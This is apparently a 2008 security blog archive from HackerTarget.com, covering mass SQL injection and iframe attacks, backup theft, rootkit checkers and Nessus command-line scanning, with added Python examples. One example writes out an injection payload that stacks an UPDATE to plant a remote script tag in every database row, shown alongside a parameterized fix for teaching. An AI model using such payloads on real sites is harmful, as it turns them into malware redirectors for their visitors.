Another mass hack - MSSQL injection compromises 500,000+ web sites

Sunday, April 27th, 2008

A simple SQL injection has resulted in more than 500,000 websites being compromised with a JavaScript include that sends visitors to the hacked sites on to other sites hosting malware, which then attempts to infect the client.

Yet another example of a simple security error resulting in the mass hacking of websites, the ultimate purpose of which is installing trojans on end-user machines. The trojans can then be used in bot armies, or for harvesting data, passwords and financial account details with keystroke loggers.

As more and more websites use database back-ends to make them faster and more dynamic, it becomes crucial to control what goes into those databases and what comes back out, especially if you allow users to submit content themselves, which happens all the time in discussion forums, blogs, feedback forms and so on.

Unless user input is validated and kept out of the SQL itself (parameterized queries, or failing that proper escaping) before it reaches the database, you do not control which statements the database runs, and so you do not control what the website ends up showing to its users. That is what SQL injection is about: exploiting weaknesses in those controls.

F-Secure Details of the hack
Sans Article

Offsite backups - Are your backups secure?

Sunday, April 27th, 2008

As we often mention here at HackerTarget.com, real security is made up of a number of different processes, policies and technologies. If one part of the security picture is missing then your data is vulnerable. Where do you keep your backups? Are they in a secure location, and are the tapes encrypted so that a lost or stolen case does not become a data breach? While this kind of theft is a fairly rare occurrence, it is a good reminder about backup security.

“A vehicle used by an off-site archive company to transport patient data was broken into on March 17. The University of Miami just made the theft public last week, saying the thieves removed a transport case carrying the school’s six computer backup tapes. On those tapes were more than 2 million medical records. In fact, the archive company waited 48 hours before notifying the university itself. A University spokeswoman said the school has stopped shipping backup tapes off-site for now.”

Slashdot Discussion

SQL Injection to compromise 10,000 web sites

Monday, April 21st, 2008

A tool discovered by the SANS Internet Storm Center handlers has shed some light on how 10,000 web sites were compromised earlier this year. At the core of the attack is an automated SQL injection tool that used Google searches to find ASP pages containing potential SQL injection points.

While we had a general idea about what they do during these attacks, and we knew that they were automated, we did not know exactly how the attacks worked, or what tools the attackers used. The strategy was relatively simple: they used search engines in order to find potentially vulnerable applications and then tried to exploit them. The exploit just consisted of an SQL statement that tried to inject a script tag into every HTML page on the web site.

Full details over at Sans.org
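Both SQL injection posts above (the 500,000-site MSSQL hack and the 10,000-site ASP attack) describe the same trick: a numeric page parameter is pasted straight into a query, so the attacker appends a second statement that writes a script tag into every stored row, and the site then serves the tag to every visitor. The example below is added here and is not code from either post or from SANS. It uses Python's sqlite3 module in place of MSSQL and a single UPDATE instead of the real tool's column-walking payload, so the mechanics stay visible; the table, rows and the script URL are constructed for the demo.

```python
import sqlite3

# Constructed sample content standing in for a site's article table.
SEED_ROWS = [
    (1, "Welcome", "<p>Hello world</p>"),
    (2, "News", "<p>Second post</p>"),
]

# Assumed attacker-controlled script location; any host name works for the demo.
INJECTED_TAG = "<script src=http://example.invalid/x.js></script>"


def fresh_db():
    """In-memory database with a small articles table (constructed test data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?, ?)", SEED_ROWS)
    db.commit()
    return db


def lookup_vulnerable(db, article_id):
    """How the compromised pages worked: the request parameter is concatenated
    into the SQL text. executescript() stands in for a driver that accepts
    stacked statements, which is what let a harmless SELECT carry an UPDATE.
    The SELECT's rows (normally rendered into the page) are ignored here; the
    point is the side effect on the stored content."""
    db.executescript("SELECT title, body FROM articles WHERE id = " + article_id)


def lookup_safe(db, article_id):
    """Hardened version: reject anything that is not an integer id, then bind the
    value as a parameter so the database never parses it as SQL."""
    if not article_id.isdigit():
        return None  # a real handler would answer HTTP 400 here
    return db.execute(
        "SELECT title, body FROM articles WHERE id = ?", (int(article_id),)
    ).fetchone()


def stored_bodies(db):
    """What the site would now serve to every visitor, in id order."""
    return [body for (body,) in db.execute("SELECT body FROM articles ORDER BY id")]


def demo():
    """Run the same payload through both code paths and report the results."""
    # The real payload would end with a comment marker to swallow the rest of
    # the original query; nothing follows the id here, so it is not needed.
    payload = "1; UPDATE articles SET body = body || '" + INJECTED_TAG + "';"

    vuln = fresh_db()
    lookup_vulnerable(vuln, payload)      # every row now carries the script tag

    safe = fresh_db()
    safe_result = lookup_safe(safe, payload)   # rejected, nothing executed

    return {
        "vulnerable_bodies": stored_bodies(vuln),
        "safe_result": safe_result,
        "safe_bodies": stored_bodies(safe),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Run it and compare the two body lists: the vulnerable path leaves the tag appended to every article, which is exactly why a single injected request could turn a whole site into a malware redirector, while the parameterized path never lets the payload near the query.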

Security Scanned Badge from HackerTarget.com

Friday, April 18th, 2008

The new Security Scanned Badge from HackerTarget.com is a badge that can be placed on the website of users of our services. This badge is a clear statement to the customer or client that the website in question takes its security seriously.

There are no ongoing costs associated with the use of the badge; it is merely an easy way to show your customers and clients that you care about their privacy and security, and that of your business.

Customers have demanded it and we have responded with this new offer.

A customer that is confident in your site is a happy customer.

Further information about the Badge

HackerTarget.com Updates

Friday, April 11th, 2008

A quick note about our latest updates. A few days ago we released a new whitepaper outlining the advantages of vulnerability scanning solutions that are based in the "Cloud". What is the cloud? It is the internet, but more than that: a utility-style computing service that is simply available. The servers could be anywhere and many, but what matters is the cloud and the seamless application that runs within it. How's that for an off the cuff definition? It is late on a Friday night, so forgive me if it makes no sense and try Googling "cloud computing".

Website updates: there have been a couple of changes to the front page to make the service offerings clearer. You will also notice an exciting addition, the new free Nessus scanning option for non-profit organizations, which is part of our initiative to help non-profits run a secure information technology environment.

And lastly, we have recently updated Nmap to version 4.60, which brings a bunch of new benefits to our free Nmap scans; you will notice much better version detection of services, among other things. Go here for the full change log.

rkhunter & chkrootkit: wise crackers only

Thursday, April 10th, 2008

A good summary of the two top rootkit hunters for Linux hosts.

Rkhunter and chkrootkit are tools to check for signs of a rootkit. They will inspect the system they’re running on and report anomalies either through the shell or via email.

Although an attacker able to install a rootkit is likely also able to easily escape or delete these tools, not every attacker is a skilful one. Not every script kiddie knows about these tools or how to cover their tracks. Since every single error can make the difference, on either side, an effortless passive protection can do no harm and adds one more (maybe thin) layer of security.

Both rkhunter and chkrootkit, indeed, can be deployed quickly and require little management effort.

http://debaday.debian.net/2008/02/06/rkhunter-chkrootkit-wise-crackers-only/
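The quoted summary says the two tools report anomalies via the shell or by email and need little management; the usual way to get that is a cron job that runs both in their quiet modes and only mails when something was flagged. The wrapper below is an added example, not from the original post or the linked Debian article. The command-line flags are each tool's documented non-interactive options (chkrootkit -q, rkhunter --cronjob --report-warnings-only); the recipient address and the sample output lines are assumptions constructed for the offline demonstration.

```python
import shutil
import socket
import subprocess

# Each tool's documented quiet/cron mode: chkrootkit -q prints only positives,
# rkhunter --cronjob runs non-interactively and --report-warnings-only drops
# the "OK" lines. Both need root to inspect the system properly.
CHECKS = [
    ["chkrootkit", "-q"],
    ["rkhunter", "--cronjob", "--report-warnings-only"],
]
ALERT_TO = "root"  # assumed recipient for this example

# Constructed sample of the two tools' output, used for the offline demonstration.
SAMPLE_OUTPUT = """\
Checking `login'... INFECTED
Checking `ls'... not infected
Warning: The command '/bin/ps' has been replaced by a script: /bin/ps: POSIX shell script
Checking `bindshell'... not infected
"""


def extract_alerts(text):
    """Keep only the lines that need a human: chkrootkit marks positives with an
    upper-case INFECTED (so 'not infected' does not match) and rkhunter
    prefixes its findings with 'Warning:'."""
    return [line for line in text.splitlines()
            if "INFECTED" in line or line.startswith("Warning:")]


def run_checks():
    """Run whichever of the two tools is installed and return their combined output."""
    chunks = []
    for argv in CHECKS:
        if shutil.which(argv[0]) is None:
            continue  # skip missing tools so the same job works on every host
        proc = subprocess.run(argv, capture_output=True, text=True)
        chunks.append(proc.stdout + proc.stderr)
    return "\n".join(chunks)


def notify(alerts):
    """Mail the findings through the local MTA; fall back to stdout without one."""
    body = "\n".join(alerts) + "\n"
    subject = f"rootkit check on {socket.gethostname()}: {len(alerts)} finding(s)"
    if shutil.which("mail"):
        subprocess.run(["mail", "-s", subject, ALERT_TO], input=body, text=True)
    else:
        print(subject + "\n" + body)


def main():
    """Cron entry point: silent when clean, one mail when either tool complains."""
    alerts = extract_alerts(run_checks())
    if alerts:
        notify(alerts)
    return len(alerts)


if __name__ == "__main__":
    # e.g. in /etc/crontab:  30 3 * * * root /usr/local/sbin/rootkit-check.py
    main()
```

Filtering on the tools' own markers rather than mailing the full transcript is what keeps the "little management effort" promise: a daily mail that is almost always empty gets ignored, a mail that only arrives when login is flagged INFECTED gets read.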

Security from the Cloud - Whitepaper

Tuesday, April 8th, 2008

A new release from HackerTarget.com: a whitepaper, "Security from the Cloud", on why vulnerability scanning out of the cloud makes so much sense. Check it out.

This white paper describes the advantages of using a remote vulnerability scanning service contained within the "Cloud": a service available from anywhere, by any system, fully contained as a remote entity and managed by a third party. Built on open source vulnerability analysis tools, Security from the Cloud is peer reviewed, open and world class. While acknowledging that vulnerability analysis is only part of securing your server, a well-defined, ongoing vulnerability assessment policy is clearly a step in the right direction.

Security from the Cloud - Whitepaper

Automated Web Application Scanners

Friday, April 4th, 2008

I stumbled across some interesting reading on open source versus commercial tools and the future of web application scanning. On the Watchfire blog there is a good discussion, with an interesting post and some good comments.

A near-perfect web application security testing tool is a difficult thing to achieve. I liken it to the elusive antivirus heuristics that occasionally pop up, yet we are still reliant on signature-based methods for antivirus and malware detection. At present the online tools here at HackerTarget.com are likewise based around scanning for known issues with particular configurations, applications or servers. SQLiX does crawl your site looking for SQL injection points and is pretty good at picking up the obvious ones.

The tools we have here, such as Nessus and Nikto, and of course Nmap, are the best at what they do. However, they will not fully test your custom-built web application for security holes.

For a real test of custom web code, nothing can beat trained and experienced web application testing specialists doing manual tests with a little help from some specific tools.

For more information on web application security testing there is an excellent collection of web application testing links over at http://owasp.org.

http://blog.watchfire.com/wfblog/2007/07/my-wish-for-ope.html

http://www.owasp.org/index.php/Phoenix/Tools

iframe attacks again

Tuesday, April 1st, 2008

The iframe attacks that have made news in recent weeks are spreading to more prominent websites. Among the sites affected are USA Today, Target and Wal-Mart. The most recent attack targets search engine results; the results are manipulated so that users are likely to visit sites that have been infected with malware.
http://www.news.com/8301-10784_3-9905951-7.html?part=rss&subj=news&tag=2547-1_3-0-20
http://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.html
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9073098&source=rss_topic17
http://www.vnunet.com/vnunet/news/2213090/search-engine-attack-lingers

The trend of drive-by downloads from compromised websites continues, or in this case compromised hosts hold the malware and search engine optimization drives people to them. Malware is a big money game; it is not going away any time soon. As always, keep your servers secure and your desktops patched.

Nessus Scanning - Command Line

Thursday, March 13th, 2008

Now that we have outlined the basics of the command line Nmap scan (remember that when it comes to security tools the GUI is for chumps), I will build on that knowledge with some Nessus command line ninja moves.

Firstly you need to install the Nessus server onto your Linux box. Just follow the instructions; it is not too difficult and is covered in many other places.

Now that you have the Nessus server installed we want to start some scans, but instead of using the GUI client we are going to go a step further and use the command line nessus client. Actually the Nessus GUI is quite a good little tool and I have used it many times. The command line tool is appropriate for running scans from remote Linux servers that you administer, and for scripting the scans (just like http://www.hackertarget.com does!). :)

nessus, version 3.0.6.

Common options :
nessus [-vnh] [-c .rcfile] [-V] [-T <format>]
Batch-mode scan:
nessus -q [-pPS] <host> <port> <user> <pass> <targets-file> <result-file>
Report conversion :
nessus -i in.[nsr|nbe] -o out.[xml|nsr|nbe|html|txt]

General options :
-v : shows version number
-h : shows this help
-T : Output format: 'nbe', 'nsr', 'html', 'xml' or 'txt'
-V : make the batch mode display status messages to the screen.
-x : override SSL "paranoia" question preventing nessus from checking certificates.

The batch mode (-q) arguments are :
host     : nessusd host
port     : nessusd host port
user     : user name
pass     : password
targets  : file containing the list of targets
result   : name of the file where nessus will store the results
-p       : obtain list of plugins installed on the server.
-P       : obtain list of server and plugin preferences.
-S       : issue SQL output for -p and -P (experimental).
-l       : Display license information

Now for an example:

nessus -q -x -T html 192.168.1.1 1241 admin adminpassword filewithtargets.txt resultsfile.html

Using the command line version of Nessus can be a very helpful, time-saving trick to help you stay secure. One caveat: in batch mode the password is passed on the command line, so it shows up in the process list and in your shell history, and -x skips the certificate check on the nessusd server; use a dedicated nessusd account that exists only for scripted scans, and drop -x once the server certificate is trusted.
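As an added example (not from the original post, and not how HackerTarget.com actually scripts its scans), here is a Python wrapper around the batch-mode command shown above. It runs the scan with -T nbe so the raw results stay machine-readable, converts the report to HTML with -i/-o as in the usage text, and parses the NBE file to list hosts worst-first. The NBE field layout assumed here (results|network|host|port|plugin id|severity|description, with Security Hole, Security Warning and Security Note as severities) is what the Nessus 3 client writes; the sample NBE text is constructed for the offline demo, and the nessusd host, credentials and file names are the post's own placeholders.

```python
import os
import subprocess
from collections import Counter

# Connection details and file names are the placeholders from the post's
# example command. Batch mode puts the password on the command line, where it
# is visible in the process list and shell history.
NESSUSD_HOST, NESSUSD_PORT = "192.168.1.1", "1241"
USER, PASSWORD = "admin", "adminpassword"
TARGETS_FILE, RESULT_FILE = "filewithtargets.txt", "results.nbe"

# Nessus 3 severities as they appear in NBE 'results' rows, worst first.
SEVERITY_RANK = {"Security Hole": 3, "Security Warning": 2, "Security Note": 1}

# Constructed NBE excerpt standing in for a real results file (the plugin
# descriptions are made up for the demo).
SAMPLE_NBE = """\
timestamps|||scan_start|Thu Mar 13 10:00:00 2008|
timestamps||192.168.1.10|host_start|Thu Mar 13 10:00:01 2008|
results|192.168.1|192.168.1.10|ssh (22/tcp)|10267|Security Note|An SSH server is listening on this port.
results|192.168.1|192.168.1.10|http (80/tcp)|11213|Security Warning|The web server answers TRACE requests.
results|192.168.1|192.168.1.20|smb (445/tcp)|22034|Security Hole|Constructed sample hole for the demo.
timestamps||192.168.1.10|host_end|Thu Mar 13 10:05:00 2008|
"""


def batch_argv(targets_file, result_file, fmt="nbe"):
    """The post's batch-mode command with -T nbe for a machine-readable result.
    -x skips the nessusd certificate prompt, which also means the server is
    not authenticated; drop it once the certificate is trusted."""
    return ["nessus", "-q", "-x", "-T", fmt, NESSUSD_HOST, NESSUSD_PORT,
            USER, PASSWORD, targets_file, result_file]


def convert_argv(nbe_file, out_file):
    """Report conversion from the usage text: nessus -i in.nbe -o out.html."""
    return ["nessus", "-i", nbe_file, "-o", out_file]


def parse_nbe(text):
    """NBE is pipe-delimited; only the 'results' rows matter here:
    results|network|host|port|plugin id|severity|description."""
    findings = []
    for line in text.splitlines():
        fields = line.split("|")
        if fields[0] != "results" or len(fields) < 7:
            continue
        _, network, host, port, plugin, severity = fields[:6]
        findings.append({"host": host, "port": port, "plugin": plugin,
                         "severity": severity, "text": "|".join(fields[6:])})
    return findings


def per_host_counts(findings):
    """Number of findings of each severity on every host."""
    counts = {}
    for f in findings:
        counts.setdefault(f["host"], Counter())[f["severity"]] += 1
    return counts


def hosts_worst_first(findings):
    """Hosts ordered by their most severe finding, so holes are triaged before notes."""
    worst = {}
    for f in findings:
        rank = SEVERITY_RANK.get(f["severity"], 0)
        worst[f["host"]] = max(worst.get(f["host"], 0), rank)
    return sorted(worst, key=lambda h: (-worst[h], h))


def run_scan(targets_file=TARGETS_FILE, result_file=RESULT_FILE):
    """Scan, convert the report to HTML, and return the parsed findings."""
    subprocess.run(batch_argv(targets_file, result_file), check=True)
    html_file = os.path.splitext(result_file)[0] + ".html"
    subprocess.run(convert_argv(result_file, html_file), check=True)
    with open(result_file) as fh:
        return parse_nbe(fh.read())


if __name__ == "__main__":
    findings = run_scan()
    counts = per_host_counts(findings)
    for host in hosts_worst_first(findings):
        print(host, dict(counts[host]))
```

Keeping the .nbe file and generating the HTML from it afterwards means the same scan can be diffed against last week's run or fed into a ticketing script, which is the real payoff of the command line over the GUI.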